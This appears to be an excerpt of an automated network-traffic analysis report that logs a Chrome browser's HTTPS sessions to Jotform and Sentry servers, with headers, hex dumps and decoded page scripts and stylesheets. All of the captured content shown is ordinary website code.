                                                                                                                                                                                                                                            Data Ascii: _MODAL:d,ENTERPRISE_BEGINNERS_BOOK_MODAL:A,PDF_DOWNLOAD_MODAL:O,ENTERPRISE_CASE_STUDY_MODAL:R,BLOG_VIDEO_GATED_CONTENT_MODAL:N,ENTERPRISE_REGISTER_UPCOMING_COURSE_MODAL:T}=r.s.PRODUCT,{ED_TECH_WEBINAR_MODAL:L,HEALTHCARE_AUTOMATION_STRATEGIES_WEBINAR_MODAL
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 55 4d 4e 5f 44 45 44 49 43 41 54 45 44 5f 53 55 50 50 4f 52 54 5f 4d 4f 44 41 4c 3a 63 65 2c 53 43 48 45 44 55 4c 45 5f 5a 4f 4f 4d 5f 4d 4f 44 41 4c 3a 73 65 2c 53 4f 43 32 5f 43 4f 4d 50 4c 49 41 4e 43 45 5f 4d 4f 44 41 4c 3a 6c 65 2c 4d 55 4c 54 49 5f 55 53 45 52 5f 4d 4f 44 41 4c 3a 6d 65 7d 3d 72 2e 73 2e 41 42 5f 54 45 53 54 2c 7b 45 44 55 43 41 54 49 4f 4e 5f 4d 4f 44 41 4c 3a 70 65 2c 45 44 55 43 41 54 49 4f 4e 5f 4d 4f 44 41 4c 5f 41 4c 54 3a 45 65 2c 46 49 45 4c 44 5f 53 45 52 56 49 43 45 5f 4d 41 4e 41 47 45 4d 45 4e 54 5f 4d 4f 44 41 4c 3a 75 65 2c 47 4f 56 45 52 4e 4d 45 4e 54 5f 4d 4f 44 41 4c 3a 64 65 2c 48 45 41 4c 54 48 43 41 52 45 5f 4d 4f 44 41 4c 3a 41 65 2c 4e 4f 4e 50 52 4f 46 49 54 5f 4d 4f 44 41 4c 3a 4f 65 2c 45 4e 54 45 52 50 52
                                                                                                                                                                                                                                            Data Ascii: UMN_DEDICATED_SUPPORT_MODAL:ce,SCHEDULE_ZOOM_MODAL:se,SOC2_COMPLIANCE_MODAL:le,MULTI_USER_MODAL:me}=r.s.AB_TEST,{EDUCATION_MODAL:pe,EDUCATION_MODAL_ALT:Ee,FIELD_SERVICE_MANAGEMENT_MODAL:ue,GOVERNMENT_MODAL:de,HEALTHCARE_MODAL:Ae,NONPROFIT_MODAL:Oe,ENTERPR
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC1369INData Raw: 61 72 6e 2d 6d 6f 72 65 2d 63 6c 69 63 6b 22 7d 7d 5d 2c 5b 4e 65 5d 3a 5b 7b 73 65 6c 65 63 74 6f 72 3a 22 23 69 6e 70 75 74 5f 32 34 34 22 2c 70 61 79 6c 6f 61 64 3a 7b 65 76 65 6e 74 3a 22 63 6f 6e 74 61 63 74 2d 73 61 6c 65 73 2d 63 6c 69 63 6b 22 7d 7d 2c 7b 73 65 6c 65 63 74 6f 72 3a 22 23 74 65 78 74 5f 32 35 30 20 61 22 2c 70 61 79 6c 6f 61 64 3a 7b 65 76 65 6e 74 3a 22 6c 65 61 72 6e 2d 6d 6f 72 65 2d 63 6c 69 63 6b 22 7d 7d 5d 2c 5b 54 65 5d 3a 5b 7b 73 65 6c 65 63 74 6f 72 3a 22 23 69 6e 70 75 74 5f 32 34 37 22 2c 70 61 79 6c 6f 61 64 3a 7b 65 76 65 6e 74 3a 22 63 6f 6e 74 61 63 74 2d 73 61 6c 65 73 2d 63 6c 69 63 6b 22 7d 7d 2c 7b 73 65 6c 65 63 74 6f 72 3a 22 23 74 65 78 74 5f 32 34 38 20 61 22 2c 70 61 79 6c 6f 61 64 3a 7b 65 76 65 6e 74 3a
                                                                                                                                                                                                                                            Data Ascii: arn-more-click"}}],[Ne]:[{selector:"#input_244",payload:{event:"contact-sales-click"}},{selector:"#text_250 a",payload:{event:"learn-more-click"}}],[Te]:[{selector:"#input_247",payload:{event:"contact-sales-click"}},{selector:"#text_248 a",payload:{event:


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            56192.168.2.174976834.120.195.2494435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC476OUTGET /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1
                                                                                                                                                                                                                                            Host: o61806.ingest.sentry.io
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC290INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:15 GMT
                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC548INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            57192.168.2.1749769104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:15 UTC540OUTGET /server/check-olark-chat-support?from=app-builder HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1358INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:16 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:36:15 GMT
                                                                                                                                                                                                                                            jf-trace-id: 6302998b4c813504
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:15 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:15 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC78INData Raw: 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 66 63 62 36 32 66 31 64 35 65 30 66 39 35 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8ffcb62f1d5e0f95-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 37 66 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 20 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d
                                                                                                                                                                                                                                            Data Ascii: 7ff9<!DOCTYPE html>...[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->...[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->...[if IE 8]> <html class="no-js lt-ie9"> <![endif]-->...[if gt IE 8]><!-
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 6a 6f 74 66 6f 72 6d 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 72 65 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 40 6a 6f 74 66 6f 72 6d 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 6f 74 66 6f 72 2e 6d 73 2f 61 73 73 65 74 73 2f 69 6d 67 2f 6c 61 6e 64 69 6e 67 2f 6f 70 65 6e 67 72 61 70 68 2e 70 6e 67 3f 76 3d 31 2e 30 2e 30 2e 30 2e 61 22 20 2f 3e 0a 3c
                                                                                                                                                                                                                                            Data Ascii: name="twitter:card" content="summary_large_image"><meta name="twitter:site" content="@jotform"><meta name="twitter:creator" content="@jotform"><meta name="twitter:image" content="https://cdn.jotfor.ms/assets/img/landing/opengraph.png?v=1.0.0.0.a" /><
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 69 67 69 6e 3d 22 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 61 70 69 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 61 63 63 6f 75 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22
                                                                                                                                                                                                                                            Data Ascii: igin="" /><link rel="preconnect" href="//www.google.com" crossorigin="" /><link rel="preconnect" href="//apis.google.com" crossorigin="" /><link rel="preconnect" href="//ssl.gstatic.com" crossorigin="" /><link rel="preconnect" href="//accounts.google.com"
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 6f 64 79 2c 20 62 6f 64 79 20 2a 22 29 3b 20 76 61 72 20 72 65 73 75 6c 74 73 20 3d 20 5b 5d 3b 20 76 61 72 20 63 68 69 6c 64 3b 20 66 6f 72 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 65 6c 65 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 20 63 68 69 6c 64 20 3d 20 65 6c 65 6d 65 6e 74 73 5b 69 5d 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 3b 20 69 66 28 65 6c 65 6d 65 6e 74 73 5b 69 5d 2e 68 61 73 43 68 69 6c 64 4e 6f 64 65 73 28 29 20 26 26 20 63 68 69 6c 64 2e 6e 6f 64 65 54 79 70 65 20 3d 3d 20 33 29 20 7b 20 72 65 73 75 6c 74 73 2e 70 75 73 68 28 63 68 69 6c 64 29 3b 20 7d 20 7d 20 72 65 74 75 72 6e 20 72 65 73 75 6c 74 73 3b 20 7d 20 76 61 72 20 74 65 78 74 6e 6f 64 65 73 20 3d 20 6e 61 74 69 76 65 53 65 6c 65 63 74 6f 72 28 29 2c
                                                                                                                                                                                                                                            Data Ascii: ody, body *"); var results = []; var child; for(var i = 0; i < elements.length; i++) { child = elements[i].childNodes[0]; if(elements[i].hasChildNodes() && child.nodeType == 3) { results.push(child); } } return results; } var textnodes = nativeSelector(),
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 6f 6e 3a 74 68 69 73 2e 64 61 74 61 73 65 74 2e 6a 66 61 7c 7c 74 68 69 73 2e 69 6e 6e 65 72 48 54 4d 4c 7d 29 3a 72 2e 74 69 63 6b 28 7b 61 63 74 6f 72 3a 77 69 6e 64 6f 77 2e 75 73 65 72 6e 61 6d 65 2c 61 63 74 69 6f 6e 3a 22 63 6c 69 63 6b 22 2c 74 61 72 67 65 74 3a 74 68 69 73 2e 64 61 74 61 73 65 74 2e 6a 66 61 7c 7c 74 68 69 73 2e 69 6e 6e 65 72 48 54 4d 4c 7d 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 69 73 49 6e 56 69 65 77 70 6f 72 74 28 74 29 7b 76 61 72 20 6e 2c 74 3d 74 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 72 65 74 75 72 6e 21 21 28 74 2e 74 6f 70 7c 7c 74 2e 72 69 67 68 74 7c 7c 74 2e 62 6f 74 74 6f 6d 7c 7c 74 2e 6c 65 66 74 7c 7c 74 2e 77 69 64 74 68 7c 7c 74 2e 68 65 69 67 68 74 7c 7c 74 2e 78 7c 7c
                                                                                                                                                                                                                                            Data Ascii: on:this.dataset.jfa||this.innerHTML}):r.tick({actor:window.username,action:"click",target:this.dataset.jfa||this.innerHTML})})})}function isInViewport(t){var n,t=t.getBoundingClientRect();return!!(t.top||t.right||t.bottom||t.left||t.width||t.height||t.x||
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 22 29 3b 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 65 6e 74 65 72 70 72 69 73 65 2d 63 6f 6d 6d 6f 6e 2d 73 65 63 74 69 6f 6e 22 29 26 26 28 74 3d 28 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 65 6e 74 65 72 70 72 69 73 65 2d 63 6f 6d 6d 6f 6e 2d 73 65 63 74 69 6f 6e 22 29 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 61 22 29 2c 6f 3d 21 31 2c 69 3d 74 68 72 6f 74 74 6c 65 28 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 6e 26 26 69 73 49 6e 56 69 65 77 70 6f 72 74 28 6e 29 26 26 21 6f 26 26 28 6f 3d 21 30 2c 28 74 3d 6e 75 6c 6c 3d 3d 28 74 3d 77 69 6e 64 6f 77 29 3f 76 6f 69 64 20 30 3a 74 2e 75 73 65 72 6e 61 6d 65 29 26 26 72 2e 74 69 63 6b 28 7b 61 63 74 6f 72 3a
                                                                                                                                                                                                                                            Data Ascii: ");document.querySelector("#enterprise-common-section")&&(t=(n=document.querySelector("#enterprise-common-section")).querySelector("a"),o=!1,i=throttle(e=function(){var t;n&&isInViewport(n)&&!o&&(o=!0,(t=null==(t=window)?void 0:t.username)&&r.tick({actor:
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 62 75 74 74 6f 6e 2c 68 72 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 70 72 6f 67 72 65 73 73 2c 73 75 62 2c 73 75 70 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 61 2c 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 70 7b 6d 61 72 67 69 6e 3a 30 7d 64 65 74 61 69
                                                                                                                                                                                                                                            Data Ascii: | MIT License | github.com/necolas/normalize.css */button,hr,input{overflow:visible}progress,sub,sup{vertical-align:baseline}a,button{background-color:transparent}html{line-height:1.15;-webkit-text-size-adjust:100%}body,h1,h2,h3,h4,h5,h6,p{margin:0}detai
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 3a 2d 77 65 62 6b 69 74 2d 69 6e 6e 65 72 2d 73 70 69 6e 2d 62 75 74 74 6f 6e 2c 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 3a 3a 2d 77 65 62 6b 69 74 2d 6f 75 74 65 72 2d 73 70 69 6e 2d 62 75 74 74 6f 6e 7b 68 65 69 67 68 74 3a 61 75 74 6f 7d 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 74 65 78 74 66 69 65 6c 64 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2d 32 70 78 7d 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 7b 2d 77 65 62 6b
                                                                                                                                                                                                                                            Data Ascii: type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webk
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC1369INData Raw: 20 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 39 34 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 33 33 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 70 61 64 64 69 6e 67 3a 30 20 31 25 7d 5b 63 6c 61 73 73 2a 3d 22 63 6f 6c 75 6d 6e 20 74 77 65 6c 76 65 20 74 77 65 6c 76 65 22 5d 2c 5b 63 6c 61 73 73 2a 3d 22 63 6f 6c 75 6d 6e 20 65 69 67 68 74 20 65 69 67 68 74 22 5d 2c 5b 63 6c 61 73 73 2a 3d 22 63 6f 6c 75 6d 6e 20 73 65 76 65 6e 20 73 65 76 65 6e 22 5d 2c 5b 63 6c 61 73 73 2a 3d 22 63 6f 6c 75 6d 6e 20 65 6c 65 76 65 6e 20 65 6c 65 76 65 6e 22 5d 2c 5b 63 6c 61 73 73 2a 3d 22 63 6f 6c 75 6d 6e 20 66 69 76 65 20 66 69 76
                                                                                                                                                                                                                                            Data Ascii: strong{font-weight:700}.container{width:94%;max-width:1330px;margin:0 auto;position:relative;padding:0 1%}[class*="column twelve twelve"],[class*="column eight eight"],[class*="column seven seven"],[class*="column eleven eleven"],[class*="column five fiv


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            58192.168.2.1749770104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC560OUTGET /s/portal/674ac14411e/static/js/2224.7e35d425.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:16 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 20329
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:21:17 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "078680bcfd27d1b1010694df27382a65"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 278
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6317d467cf3-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:16 UTC941INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 36 64 33 31 39 31 62 34 2d 30 65 33 30 2d 35 34 36 63 2d 38 62 31 65 2d 61 33 38 37 38 64
                                                                                                                                                                                                                                            Data Ascii: "use strict";!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="6d3191b4-0e30-546c-8b1e-a3878d
